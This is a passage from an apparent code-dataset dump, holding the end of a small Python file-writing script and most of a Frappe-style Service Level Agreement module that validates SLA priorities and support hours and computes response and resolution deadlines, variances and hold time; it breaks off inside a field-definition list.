f=open(fname, 'w')\n f.write(bonddef_string)\n f.close()\n netlistWriter = adsVarNetlistWriter(adsFname, shapename, bonddef_string)\n netlistWriter.write()\n netlistWriter.close()\n except:\n raise\n sys.exit(0)\n\nif os.path.isfile(adsFname):\n os.remove(adsFname)\nif os.path.isfile(fname):\n os.remove(fname)\nsys.exit(1)\n","sub_path":"uuu/ebond_edit_profile.py","file_name":"ebond_edit_profile.py","file_ext":"py","file_size_in_byte":6554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"5570952","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2018, Frappe Technologies Pvt. Ltd. and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\nfrom frappe import _\nfrom frappe.core.utils import get_parent_doc\nfrom frappe.utils import time_diff_in_seconds, getdate, get_weekdays, add_to_date, get_time, get_datetime, \\\n\tget_time_zone, to_timedelta, get_datetime_str, get_link_to_form, cint\nfrom datetime import datetime\nfrom verp.support.doctype.issue.issue import get_holidays\n\nclass ServiceLevelAgreement(Document):\n\tdef validate(self):\n\t\tself.validate_doc()\n\t\tself.validate_status_field()\n\t\tself.check_priorities()\n\t\tself.check_support_and_resolution()\n\n\tdef check_priorities(self):\n\t\tpriorities = []\n\n\t\tfor priority in self.priorities:\n\t\t\t# Check if response and resolution time is set for every priority\n\t\t\tif not priority.response_time:\n\t\t\t\tfrappe.throw(_(\"Set Response Time for Priority {0} in row {1}.\").format(priority.priority, priority.idx))\n\n\t\t\tif self.apply_sla_for_resolution:\n\t\t\t\tif not priority.resolution_time:\n\t\t\t\t\tfrappe.throw(_(\"Set Response Time for Priority {0} in row {1}.\").format(priority.priority, priority.idx))\n\n\t\t\t\tresponse = priority.response_time\n\t\t\t\tresolution = priority.resolution_time\n\t\t\t\tif response > resolution:\n\t\t\t\t\tfrappe.throw(_(\"Response Time for {0} priority in row {1} can't be greater than Resolution Time.\").format(priority.priority, priority.idx))\n\n\t\t\tpriorities.append(priority.priority)\n\n\t\t# Check if repeated priority\n\t\tif not len(set(priorities)) == len(priorities):\n\t\t\trepeated_priority = get_repeated(priorities)\n\t\t\tfrappe.throw(_(\"Priority {0} has been repeated.\").format(repeated_priority))\n\n\t\t# set default priority from priorities\n\t\ttry:\n\t\t\tself.default_priority = next(d.priority for d in self.priorities if d.default_priority)\n\t\texcept Exception:\n\t\t\tfrappe.throw(_(\"Select a Default Priority.\"))\n\n\tdef check_support_and_resolution(self):\n\t\tweek = get_weekdays()\n\t\tsupport_days = []\n\n\t\tfor support_and_resolution in self.support_and_resolution:\n\t\t\tsupport_days.append(support_and_resolution.workday)\n\t\t\tsupport_and_resolution.idx = week.index(support_and_resolution.workday) + 1\n\n\t\t\tif to_timedelta(support_and_resolution.start_time) >= to_timedelta(support_and_resolution.end_time):\n\t\t\t\tfrappe.throw(_(\"Start Time can't be greater than or equal to End Time for {0}.\").format(\n\t\t\t\t\tsupport_and_resolution.workday))\n\n\t\t# Check for repeated workday\n\t\tif not len(set(support_days)) == len(support_days):\n\t\t\trepeated_days = get_repeated(support_days)\n\t\t\tfrappe.throw(_(\"Workday {0} has been repeated.\").format(repeated_days))\n\n\tdef validate_doc(self):\n\t\tif self.enabled and self.document_type == \"Issue\" \\\n\t\t\tand not frappe.db.get_single_value(\"Support Settings\", \"track_service_level_agreement\"):\n\t\t\tfrappe.throw(_(\"{0} is not enabled in {1}\").format(frappe.bold(\"Track Service Level Agreement\"),\n\t\t\t\tget_link_to_form(\"Support Settings\", \"Support Settings\")))\n\n\t\tif self.default_service_level_agreement and frappe.db.exists(\"Service Level Agreement\", {\n\t\t\t\"document_type\": self.document_type,\n\t\t\t\"default_service_level_agreement\": \"1\",\n\t\t\t\"name\": [\"!=\", self.name]\n\t\t}):\n\t\t\tfrappe.throw(_(\"Default Service Level Agreement for {0} already exists.\").format(self.document_type))\n\n\t\tif self.start_date and self.end_date:\n\t\t\tself.validate_from_to_dates(self.start_date, self.end_date)\n\n\t\tif self.entity_type and self.entity and frappe.db.exists(\"Service Level Agreement\", {\n\t\t\t\"entity_type\": self.entity_type,\n\t\t\t\"entity\": self.entity,\n\t\t\t\"name\": [\"!=\", self.name]\n\t\t}):\n\t\t\tfrappe.throw(_(\"Service Level Agreement for {0} {1} already exists.\").format(\n\t\t\t\tfrappe.bold(self.entity_type), frappe.bold(self.entity)))\n\n\tdef validate_status_field(self):\n\t\tmeta = frappe.get_meta(self.document_type)\n\t\tif not meta.get_field(\"status\"):\n\t\t\tfrappe.throw(_(\"The Document Type {0} must have a Status field to configure Service Level Agreement\").format(\n\t\t\t\tfrappe.bold(self.document_type)))\n\n\tdef get_service_level_agreement_priority(self, priority):\n\t\tpriority = frappe.get_doc(\"Service Level Priority\", {\"priority\": priority, \"parent\": self.name})\n\n\t\treturn frappe._dict({\n\t\t\t\"priority\": priority.priority,\n\t\t\t\"response_time\": priority.response_time,\n\t\t\t\"resolution_time\": priority.resolution_time\n\t\t})\n\n\tdef before_insert(self):\n\t\t# no need to set up SLA fields for Issue dt as they are standard fields in Issue\n\t\tif self.document_type == \"Issue\":\n\t\t\treturn\n\n\t\tservice_level_agreement_fields = get_service_level_agreement_fields()\n\t\tmeta = frappe.get_meta(self.document_type, cached=False)\n\n\t\tif meta.custom:\n\t\t\tself.create_docfields(meta, service_level_agreement_fields)\n\t\telse:\n\t\t\tself.create_custom_fields(meta, service_level_agreement_fields)\n\n\tdef on_trash(self):\n\t\tset_documents_with_active_service_level_agreement()\n\n\tdef after_insert(self):\n\t\tset_documents_with_active_service_level_agreement()\n\n\tdef on_update(self):\n\t\tset_documents_with_active_service_level_agreement()\n\n\tdef create_docfields(self, meta, service_level_agreement_fields):\n\t\tlast_index = len(meta.fields)\n\n\t\tfor field in service_level_agreement_fields:\n\t\t\tif not meta.has_field(field.get(\"fieldname\")):\n\t\t\t\tlast_index += 1\n\n\t\t\t\tfrappe.get_doc({\n\t\t\t\t\t\"doctype\": \"DocField\",\n\t\t\t\t\t\"idx\": last_index,\n\t\t\t\t\t\"parenttype\": \"DocType\",\n\t\t\t\t\t\"parentfield\": \"fields\",\n\t\t\t\t\t\"parent\": self.document_type,\n\t\t\t\t\t\"label\": field.get(\"label\"),\n\t\t\t\t\t\"fieldname\": field.get(\"fieldname\"),\n\t\t\t\t\t\"fieldtype\": field.get(\"fieldtype\"),\n\t\t\t\t\t\"collapsible\": field.get(\"collapsible\"),\n\t\t\t\t\t\"options\": field.get(\"options\"),\n\t\t\t\t\t\"read_only\": field.get(\"read_only\"),\n\t\t\t\t\t\"hidden\": field.get(\"hidden\"),\n\t\t\t\t\t\"description\": field.get(\"description\"),\n\t\t\t\t\t\"default\": field.get(\"default\"),\n\t\t\t\t}).insert(ignore_permissions=True)\n\t\t\telse:\n\t\t\t\texisting_field = meta.get_field(field.get(\"fieldname\"))\n\t\t\t\tself.reset_field_properties(existing_field, \"DocField\", field)\n\n\t\t# to update meta and modified timestamp\n\t\tfrappe.get_doc('DocType', self.document_type).save(ignore_permissions=True)\n\n\tdef create_custom_fields(self, meta, service_level_agreement_fields):\n\t\tfor field in service_level_agreement_fields:\n\t\t\tif not meta.has_field(field.get(\"fieldname\")):\n\t\t\t\tfrappe.get_doc({\n\t\t\t\t\t\"doctype\": \"Custom Field\",\n\t\t\t\t\t\"dt\": self.document_type,\n\t\t\t\t\t\"label\": field.get(\"label\"),\n\t\t\t\t\t\"fieldname\": field.get(\"fieldname\"),\n\t\t\t\t\t\"fieldtype\": field.get(\"fieldtype\"),\n\t\t\t\t\t\"insert_after\": \"append\",\n\t\t\t\t\t\"collapsible\": field.get(\"collapsible\"),\n\t\t\t\t\t\"options\": field.get(\"options\"),\n\t\t\t\t\t\"read_only\": field.get(\"read_only\"),\n\t\t\t\t\t\"hidden\": field.get(\"hidden\"),\n\t\t\t\t\t\"description\": field.get(\"description\"),\n\t\t\t\t\t\"default\": field.get(\"default\"),\n\t\t\t\t}).insert(ignore_permissions=True)\n\t\t\telse:\n\t\t\t\texisting_field = meta.get_field(field.get(\"fieldname\"))\n\t\t\t\tself.reset_field_properties(existing_field, \"Custom Field\", field)\n\n\tdef reset_field_properties(self, field, field_dt, sla_field):\n\t\tfield = frappe.get_doc(field_dt, {\"fieldname\": field.fieldname})\n\t\tfield.label = sla_field.get(\"label\")\n\t\tfield.fieldname = sla_field.get(\"fieldname\")\n\t\tfield.fieldtype = sla_field.get(\"fieldtype\")\n\t\tfield.collapsible = sla_field.get(\"collapsible\")\n\t\tfield.hidden = sla_field.get(\"hidden\")\n\t\tfield.options = sla_field.get(\"options\")\n\t\tfield.read_only = sla_field.get(\"read_only\")\n\t\tfield.hidden = sla_field.get(\"hidden\")\n\t\tfield.description = sla_field.get(\"description\")\n\t\tfield.default = sla_field.get(\"default\")\n\t\tfield.save(ignore_permissions=True)\n\n\ndef check_agreement_status():\n\tservice_level_agreements = frappe.get_all(\"Service Level Agreement\", filters=[\n\t\t{\"enabled\": 1},\n\t\t{\"default_service_level_agreement\": 0}\n\t], fields=[\"name\"])\n\n\tfor service_level_agreement in service_level_agreements:\n\t\tdoc = frappe.get_doc(\"Service Level Agreement\", service_level_agreement.name)\n\t\tif doc.end_date and getdate(doc.end_date) < getdate(frappe.utils.getdate()):\n\t\t\tfrappe.db.set_value(\"Service Level Agreement\", service_level_agreement.name, \"enabled\", 0)\n\n\ndef get_active_service_level_agreement_for(doctype, priority, customer=None, service_level_agreement=None):\n\tif doctype == \"Issue\" and not frappe.db.get_single_value(\"Support Settings\", \"track_service_level_agreement\"):\n\t\treturn\n\n\tfilters = [\n\t\t[\"Service Level Agreement\", \"document_type\", \"=\", doctype],\n\t\t[\"Service Level Agreement\", \"enabled\", \"=\", 1]\n\t]\n\tif priority:\n\t\tfilters.append([\"Service Level Priority\", \"priority\", \"=\", priority])\n\n\tor_filters = []\n\tif service_level_agreement:\n\t\tor_filters = [\n\t\t\t[\"Service Level Agreement\", \"name\", \"=\", service_level_agreement],\n\t\t]\n\n\tif customer:\n\t\tor_filters.append(\n\t\t\t[\"Service Level Agreement\", \"entity\", \"in\", [customer, get_customer_group(customer), get_customer_territory(customer)]]\n\t\t)\n\tor_filters.append([\"Service Level Agreement\", \"default_service_level_agreement\", \"=\", 1])\n\n\tagreement = frappe.get_all(\"Service Level Agreement\", filters=filters, or_filters=or_filters,\n\t\tfields=[\"name\", \"default_priority\", \"apply_sla_for_resolution\"])\n\n\treturn agreement[0] if agreement else None\n\n\ndef get_customer_group(customer):\n\treturn frappe.db.get_value(\"Customer\", customer, \"customer_group\") if customer else None\n\n\ndef get_customer_territory(customer):\n\treturn frappe.db.get_value(\"Customer\", customer, \"territory\") if customer else None\n\n\n@frappe.whitelist()\ndef get_service_level_agreement_filters(doctype, name, customer=None):\n\tif not frappe.db.get_single_value(\"Support Settings\", \"track_service_level_agreement\"):\n\t\treturn\n\n\tfilters = [\n\t\t[\"Service Level Agreement\", \"document_type\", \"=\", doctype],\n\t\t[\"Service Level Agreement\", \"enabled\", \"=\", 1]\n\t]\n\n\tor_filters = [\n\t\t[\"Service Level Agreement\", \"default_service_level_agreement\", \"=\", 1]\n\t]\n\n\tif customer:\n\t\t# Include SLA with No Entity and Entity Type\n\t\tor_filters.append(\n\t\t\t[\"Service Level Agreement\", \"entity\", \"in\", [customer, get_customer_group(customer), get_customer_territory(customer), \"\"]]\n\t\t)\n\n\treturn {\n\t\t\"priority\": [priority.priority for priority in frappe.get_all(\"Service Level Priority\", filters={\"parent\": name}, fields=[\"priority\"])],\n\t\t\"service_level_agreements\": [d.name for d in frappe.get_all(\"Service Level Agreement\", filters=filters, or_filters=or_filters)]\n\t}\n\n\ndef get_repeated(values):\n\tunique_list = []\n\tdiff = []\n\tfor value in values:\n\t\tif value not in unique_list:\n\t\t\tunique_list.append(str(value))\n\t\telse:\n\t\t\tif value not in diff:\n\t\t\t\tdiff.append(str(value))\n\treturn \" \".join(diff)\n\n\ndef get_documents_with_active_service_level_agreement():\n\tif not frappe.cache().hget(\"service_level_agreement\", \"active\"):\n\t\tset_documents_with_active_service_level_agreement()\n\n\treturn frappe.cache().hget(\"service_level_agreement\", \"active\")\n\n\ndef set_documents_with_active_service_level_agreement():\n\tactive = [sla.document_type for sla in frappe.get_all(\"Service Level Agreement\", fields=[\"document_type\"])]\n\tfrappe.cache().hset(\"service_level_agreement\", \"active\", active)\n\n\ndef apply(doc, method=None):\n\t# Applies SLA to document on validate\n\tif frappe.flags.in_patch or frappe.flags.in_install or frappe.flags.in_setup_wizard or \\\n\t\tdoc.doctype not in get_documents_with_active_service_level_agreement():\n\t\treturn\n\n\tservice_level_agreement = get_active_service_level_agreement_for(doctype=doc.get(\"doctype\"), priority=doc.get(\"priority\"),\n\t\tcustomer=doc.get(\"customer\"), service_level_agreement=doc.get(\"service_level_agreement\"))\n\n\tif not service_level_agreement:\n\t\treturn\n\n\tset_sla_properties(doc, service_level_agreement)\n\n\ndef set_sla_properties(doc, service_level_agreement):\n\tif frappe.db.exists(doc.doctype, doc.name):\n\t\tfrom_db = frappe.get_doc(doc.doctype, doc.name)\n\telse:\n\t\tfrom_db = frappe._dict({})\n\n\tmeta = frappe.get_meta(doc.doctype)\n\n\tif meta.has_field(\"customer\") and service_level_agreement.customer and doc.get(\"customer\") and \\\n\t\tnot service_level_agreement.customer == doc.get(\"customer\"):\n\t\tfrappe.throw(_(\"Service Level Agreement {0} is specific to Customer {1}\").format(service_level_agreement.name,\n\t\t\tservice_level_agreement.customer))\n\n\tdoc.service_level_agreement = service_level_agreement.name\n\tdoc.priority = doc.get(\"priority\") or service_level_agreement.default_priority\n\tpriority = get_priority(doc)\n\n\tif not doc.creation:\n\t\tdoc.creation = now_datetime(doc.get(\"owner\"))\n\n\t\tif meta.has_field(\"service_level_agreement_creation\"):\n\t\t\tdoc.service_level_agreement_creation = now_datetime(doc.get(\"owner\"))\n\n\tstart_date_time = get_datetime(doc.get(\"service_level_agreement_creation\") or doc.creation)\n\n\tset_response_by_and_variance(doc, meta, start_date_time, priority)\n\tif service_level_agreement.apply_sla_for_resolution:\n\t\tset_resolution_by_and_variance(doc, meta, start_date_time, priority)\n\n\tupdate_status(doc, from_db, meta)\n\n\ndef update_status(doc, from_db, meta):\n\tif meta.has_field(\"status\"):\n\t\tif meta.has_field(\"first_responded_on\") and doc.status != \"Open\" and \\\n\t\t\tfrom_db.status == \"Open\" and not doc.first_responded_on:\n\t\t\tdoc.first_responded_on = frappe.flags.current_time or now_datetime(doc.get(\"owner\"))\n\n\t\tif meta.has_field(\"service_level_agreement\") and doc.service_level_agreement:\n\t\t\t# mark sla status as fulfilled based on the configuration\n\t\t\tfulfillment_statuses = [entry.status for entry in frappe.db.get_all(\"SLA Fulfilled On Status\", filters={\n\t\t\t\t\"parent\": doc.service_level_agreement\n\t\t\t}, fields=[\"status\"])]\n\n\t\t\tif doc.status in fulfillment_statuses and from_db.status not in fulfillment_statuses:\n\t\t\t\tapply_sla_for_resolution = frappe.db.get_value(\"Service Level Agreement\", doc.service_level_agreement,\n\t\t\t\t\t\"apply_sla_for_resolution\")\n\n\t\t\t\tif apply_sla_for_resolution and meta.has_field(\"resolution_date\"):\n\t\t\t\t\tdoc.resolution_date = frappe.flags.current_time or now_datetime(doc.get(\"owner\"))\n\n\t\t\t\tif meta.has_field(\"agreement_status\") and from_db.agreement_status == \"Ongoing\":\n\t\t\t\t\tset_service_level_agreement_variance(doc.doctype, doc.name)\n\t\t\t\t\tupdate_agreement_status(doc, meta)\n\n\t\t\t\tif apply_sla_for_resolution:\n\t\t\t\t\tset_resolution_time(doc, meta)\n\t\t\t\t\tset_user_resolution_time(doc, meta)\n\n\t\tif doc.status == \"Open\" and from_db.status != \"Open\":\n\t\t\t# if no date, it should be set as None and not a blank string \"\", as per mysql strict config\n\t\t\t# enable SLA and variance on Reopen\n\t\t\treset_metrics(doc, meta)\n\t\t\tset_service_level_agreement_variance(doc.doctype, doc.name)\n\n\thandle_hold_time(doc, meta, from_db.status)\n\n\ndef get_expected_time_for(parameter, service_level, start_date_time):\n\tcurrent_date_time = start_date_time\n\texpected_time = current_date_time\n\tstart_time = end_time = None\n\texpected_time_is_set = 0\n\n\tallotted_seconds = get_allotted_seconds(parameter, service_level)\n\tsupport_days = get_support_days(service_level)\n\tholidays = get_holidays(service_level.get(\"holiday_list\"))\n\tweekdays = get_weekdays()\n\n\twhile not expected_time_is_set:\n\t\tcurrent_weekday = weekdays[current_date_time.weekday()]\n\n\t\tif not is_holiday(current_date_time, holidays) and current_weekday in support_days:\n\t\t\tif getdate(current_date_time) == getdate(start_date_time) \\\n\t\t\t\tand get_time_in_timedelta(current_date_time.time()) > support_days[current_weekday].start_time:\n\t\t\t\tstart_time = current_date_time - datetime(current_date_time.year, current_date_time.month, current_date_time.day)\n\t\t\telse:\n\t\t\t\tstart_time = support_days[current_weekday].start_time\n\n\t\t\tend_time = support_days[current_weekday].end_time\n\t\t\ttime_left_today = time_diff_in_seconds(end_time, start_time)\n\t\t\t# no time left for support today\n\t\t\tif time_left_today <= 0:\n\t\t\t\tpass\n\n\t\t\telif allotted_seconds:\n\t\t\t\tif time_left_today >= allotted_seconds:\n\t\t\t\t\texpected_time = datetime.combine(getdate(current_date_time), get_time(start_time))\n\t\t\t\t\texpected_time = add_to_date(expected_time, seconds=allotted_seconds)\n\t\t\t\t\texpected_time_is_set = 1\n\t\t\t\telse:\n\t\t\t\t\tallotted_seconds = allotted_seconds - time_left_today\n\n\t\tif not expected_time_is_set:\n\t\t\tcurrent_date_time = add_to_date(current_date_time, days=1)\n\n\tif end_time and allotted_seconds >= 86400:\n\t\tcurrent_date_time = datetime.combine(getdate(current_date_time), get_time(end_time))\n\telse:\n\t\tcurrent_date_time = expected_time\n\n\treturn current_date_time\n\n\ndef get_allotted_seconds(parameter, service_level):\n\tallotted_seconds = 0\n\tif parameter == \"response\":\n\t\tallotted_seconds = service_level.get(\"response_time\")\n\telif parameter == \"resolution\":\n\t\tallotted_seconds = service_level.get(\"resolution_time\")\n\telse:\n\t\tfrappe.throw(_(\"{0} parameter is invalid\").format(parameter))\n\n\treturn allotted_seconds\n\n\ndef get_support_days(service_level):\n\tsupport_days = {}\n\tfor service in service_level.get(\"support_and_resolution\"):\n\t\tsupport_days[service.workday] = frappe._dict({\n\t\t\t\"start_time\": service.start_time,\n\t\t\t\"end_time\": service.end_time,\n\t\t})\n\treturn support_days\n\n\ndef set_service_level_agreement_variance(doctype, doc=None):\n\n\tfilters = {\"status\": \"Open\", \"agreement_status\": \"Ongoing\"}\n\n\tif doc:\n\t\tfilters = {\"name\": doc}\n\n\tfor entry in frappe.get_all(doctype, filters=filters):\n\t\tcurrent_doc = frappe.get_doc(doctype, entry.name)\n\t\tcurrent_time = frappe.flags.current_time or now_datetime(current_doc.get(\"owner\"))\n\t\tapply_sla_for_resolution = frappe.db.get_value(\"Service Level Agreement\", current_doc.service_level_agreement,\n\t\t\t\"apply_sla_for_resolution\")\n\n\t\tif not current_doc.first_responded_on: # first_responded_on set when first reply is sent to customer\n\t\t\tvariance = round(time_diff_in_seconds(current_doc.response_by, current_time), 2)\n\t\t\tfrappe.db.set_value(current_doc.doctype, current_doc.name, \"response_by_variance\", variance, update_modified=False)\n\n\t\t\tif variance < 0:\n\t\t\t\tfrappe.db.set_value(current_doc.doctype, current_doc.name, \"agreement_status\", \"Failed\", update_modified=False)\n\n\t\tif apply_sla_for_resolution and not current_doc.get(\"resolution_date\"): # resolution_date set when issue has been closed\n\t\t\tvariance = round(time_diff_in_seconds(current_doc.resolution_by, current_time), 2)\n\t\t\tfrappe.db.set_value(current_doc.doctype, current_doc.name, \"resolution_by_variance\", variance, update_modified=False)\n\n\t\t\tif variance < 0:\n\t\t\t\tfrappe.db.set_value(current_doc.doctype, current_doc.name, \"agreement_status\", \"Failed\", update_modified=False)\n\n\ndef set_user_resolution_time(doc, meta):\n\t# total time taken by a user to close the issue apart from wait_time\n\tif not meta.has_field(\"user_resolution_time\"):\n\t\treturn\n\n\tcommunications = frappe.get_all(\"Communication\", filters={\n\t\t\t\"reference_doctype\": doc.doctype,\n\t\t\t\"reference_name\": doc.name\n\t\t}, fields=[\"sent_or_received\", \"name\", \"creation\"], order_by=\"creation\")\n\n\tpending_time = []\n\tfor i in range(len(communications)):\n\t\tif communications[i].sent_or_received == \"Received\" and communications[i-1].sent_or_received == \"Sent\":\n\t\t\twait_time = time_diff_in_seconds(communications[i].creation, communications[i-1].creation)\n\t\t\tif wait_time > 0:\n\t\t\t\tpending_time.append(wait_time)\n\n\ttotal_pending_time = sum(pending_time)\n\tresolution_time_in_secs = time_diff_in_seconds(doc.resolution_date, doc.creation)\n\tdoc.user_resolution_time = resolution_time_in_secs - total_pending_time\n\n\ndef change_service_level_agreement_and_priority(self):\n\tif self.service_level_agreement and frappe.db.exists(\"Issue\", self.name) and \\\n\t\tfrappe.db.get_single_value(\"Support Settings\", \"track_service_level_agreement\"):\n\n\t\tif not self.priority == frappe.db.get_value(\"Issue\", self.name, \"priority\"):\n\t\t\tself.set_response_and_resolution_time(priority=self.priority, service_level_agreement=self.service_level_agreement)\n\t\t\tfrappe.msgprint(_(\"Priority has been changed to {0}.\").format(self.priority))\n\n\t\tif not self.service_level_agreement == frappe.db.get_value(\"Issue\", self.name, \"service_level_agreement\"):\n\t\t\tself.set_response_and_resolution_time(priority=self.priority, service_level_agreement=self.service_level_agreement)\n\t\t\tfrappe.msgprint(_(\"Service Level Agreement has been changed to {0}.\").format(self.service_level_agreement))\n\n\ndef get_priority(doc):\n\tservice_level_agreement = frappe.get_doc(\"Service Level Agreement\", doc.service_level_agreement)\n\tpriority = service_level_agreement.get_service_level_agreement_priority(doc.priority)\n\tpriority.update({\n\t\t\"support_and_resolution\": service_level_agreement.support_and_resolution,\n\t\t\"holiday_list\": service_level_agreement.holiday_list\n\t})\n\treturn priority\n\n\ndef reset_service_level_agreement(doc, reason, user):\n\tif not frappe.db.get_single_value(\"Support Settings\", \"allow_resetting_service_level_agreement\"):\n\t\tfrappe.throw(_(\"Allow Resetting Service Level Agreement from Support Settings.\"))\n\n\tfrappe.get_doc({\n\t\t\"doctype\": \"Comment\",\n\t\t\"comment_type\": \"Info\",\n\t\t\"reference_doctype\": doc.doctype,\n\t\t\"reference_name\": doc.name,\n\t\t\"comment_email\": user,\n\t\t\"content\": \" resetted Service Level Agreement - {0}\".format(_(reason)),\n\t}).insert(ignore_permissions=True)\n\n\tdoc.service_level_agreement_creation = now_datetime(doc.get(\"owner\"))\n\tdoc.set_response_and_resolution_time(priority=doc.priority, service_level_agreement=doc.service_level_agreement)\n\tdoc.agreement_status = \"Ongoing\"\n\tdoc.save()\n\n\ndef reset_metrics(doc, meta):\n\tif meta.has_field(\"resolution_date\"):\n\t\tdoc.resolution_date = None\n\n\tif not meta.has_field(\"resolution_time\"):\n\t\tdoc.resolution_time = None\n\n\tif not meta.has_field(\"user_resolution_time\"):\n\t\tdoc.user_resolution_time = None\n\n\tif meta.has_field(\"agreement_status\"):\n\t\tdoc.agreement_status = \"Ongoing\"\n\n\ndef set_resolution_time(doc, meta):\n\t# total time taken from issue creation to closing\n\tif not meta.has_field(\"resolution_time\"):\n\t\treturn\n\n\tdoc.resolution_time = time_diff_in_seconds(doc.resolution_date, doc.creation)\n\n\n# called via hooks on communication update\ndef update_hold_time(doc, status):\n\tparent = get_parent_doc(doc)\n\tif not parent:\n\t\treturn\n\n\tif doc.communication_type == \"Comment\":\n\t\treturn\n\n\tstatus_field = parent.meta.get_field(\"status\")\n\tif status_field:\n\t\toptions = (status_field.options or \"\").splitlines()\n\n\t\t# if status has a \"Replied\" option, then handle hold time\n\t\tif (\"Replied\" in options) and doc.sent_or_received == \"Received\":\n\t\t\tmeta = frappe.get_meta(parent.doctype)\n\t\t\thandle_hold_time(parent, meta, 'Replied')\n\n\ndef handle_hold_time(doc, meta, status):\n\tif meta.has_field(\"service_level_agreement\") and doc.service_level_agreement:\n\t\t# set response and resolution variance as None as the issue is on Hold for status as Replied\n\t\thold_statuses = [entry.status for entry in frappe.db.get_all(\"Pause SLA On Status\", filters={\n\t\t\t\t\"parent\": doc.service_level_agreement\n\t\t\t}, fields=[\"status\"])]\n\n\t\tif not hold_statuses:\n\t\t\treturn\n\n\t\tif meta.has_field(\"status\") and doc.status in hold_statuses and status not in hold_statuses:\n\t\t\tapply_hold_status(doc, meta)\n\n\t\t# calculate hold time when status is changed from any hold status to any non-hold status\n\t\tif meta.has_field(\"status\") and doc.status not in hold_statuses and status in hold_statuses:\n\t\t\treset_hold_status_and_update_hold_time(doc, meta)\n\n\ndef apply_hold_status(doc, meta):\n\tupdate_values = {'on_hold_since': frappe.flags.current_time or now_datetime(doc.get(\"owner\"))}\n\n\tif meta.has_field(\"first_responded_on\") and not doc.first_responded_on:\n\t\tupdate_values['response_by'] = None\n\t\tupdate_values['response_by_variance'] = 0\n\n\tupdate_values['resolution_by'] = None\n\tupdate_values['resolution_by_variance'] = 0\n\n\tdoc.db_set(update_values)\n\n\ndef reset_hold_status_and_update_hold_time(doc, meta):\n\thold_time = doc.total_hold_time if meta.has_field(\"total_hold_time\") and doc.total_hold_time else 0\n\tnow_time = frappe.flags.current_time or now_datetime(doc.get(\"owner\"))\n\tlast_hold_time = 0\n\tupdate_values = {}\n\n\tif meta.has_field(\"on_hold_since\") and doc.on_hold_since:\n\t\t# last_hold_time will be added to the sla variables\n\t\tlast_hold_time = time_diff_in_seconds(now_time, doc.on_hold_since)\n\t\tupdate_values['total_hold_time'] = hold_time + last_hold_time\n\n\t# re-calculate SLA variables after issue changes from any hold status to any non-hold status\n\tstart_date_time = get_datetime(doc.get(\"service_level_agreement_creation\") or doc.creation)\n\tpriority = get_priority(doc)\n\tnow_time = frappe.flags.current_time or now_datetime(doc.get(\"owner\"))\n\n\t# add hold time to response by variance\n\tif meta.has_field(\"first_responded_on\") and not doc.first_responded_on:\n\t\tresponse_by = get_expected_time_for(parameter=\"response\", service_level=priority, start_date_time=start_date_time)\n\t\tresponse_by = add_to_date(response_by, seconds=round(last_hold_time))\n\t\tresponse_by_variance = round(time_diff_in_seconds(response_by, now_time))\n\n\t\tupdate_values['response_by'] = response_by\n\t\tupdate_values['response_by_variance'] = response_by_variance + last_hold_time\n\n\t# add hold time to resolution by variance\n\tif frappe.db.get_value(\"Service Level Agreement\", doc.service_level_agreement, \"apply_sla_for_resolution\"):\n\t\tresolution_by = get_expected_time_for(parameter=\"resolution\", service_level=priority, start_date_time=start_date_time)\n\t\tresolution_by = add_to_date(resolution_by, seconds=round(last_hold_time))\n\t\tresolution_by_variance = round(time_diff_in_seconds(resolution_by, now_time))\n\n\t\tupdate_values['resolution_by'] = resolution_by\n\t\tupdate_values['resolution_by_variance'] = resolution_by_variance + last_hold_time\n\n\tupdate_values['on_hold_since'] = None\n\n\tdoc.db_set(update_values)\n\n\ndef get_service_level_agreement_fields():\n\treturn [\n\t\t{\n\t\t\t\"collapsible\": 1,\n\t\t\t\"fieldname\": \"service_level_section\",\n\t\t\t\"fieldtype\": \"Section Break\",\n\t\t\t\"label\": \"Service Level\"\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"service_level_agreement\",\n\t\t\t\"fieldtype\": \"Link\",\n\t\t\t\"label\": \"Service Level Agreement\",\n\t\t\t\"options\": \"Service Level Agreement\"\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"priority\",\n\t\t\t\"fieldtype\": \"Link\",\n\t\t\t\"label\": \"Priority\",\n\t\t\t\"options\": \"Issue Priority\"\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"response_by\",\n\t\t\t\"fieldtype\": \"Datetime\",\n\t\t\t\"label\": \"Response By\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"response_by_variance\",\n\t\t\t\"fieldtype\": \"Duration\",\n\t\t\t\"hide_seconds\": 1,\n\t\t\t\"label\": \"Response By Variance\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"first_responded_on\",\n\t\t\t\"fieldtype\": \"Datetime\",\n\t\t\t\"label\": \"First Responded On\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"on_hold_since\",\n\t\t\t\"fieldtype\": \"Datetime\",\n\t\t\t\"hidden\": 1,\n\t\t\t\"label\": \"On Hold Since\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"total_hold_time\",\n\t\t\t\"fieldtype\": \"Duration\",\n\t\t\t\"label\": \"Total Hold Time\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"cb\",\n\t\t\t\"fieldtype\": \"Column Break\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"default\": \"Ongoing\",\n\t\t\t\"fieldname\": \"agreement_status\",\n\t\t\t\"fieldtype\": \"Select\",\n\t\t\t\"label\": \"Service Level Agreement Status\",\n\t\t\t\"options\": \"Ongoing\\nFulfilled\\nFailed\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"resolution_by\",\n\t\t\t\"fieldtype\": \"Datetime\",\n\t\t\t\"label\": \"Resolution By\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": \"resolution_by_variance\",\n\t\t\t\"fieldtype\": \"Duration\",\n\t\t\t\"hide_seconds\": 1,\n\t\t\t\"label\": \"Resolution By Variance\",\n\t\t\t\"read_only\": 1\n\t\t},\n\t\t{\n\t\t\t\"fieldname\": 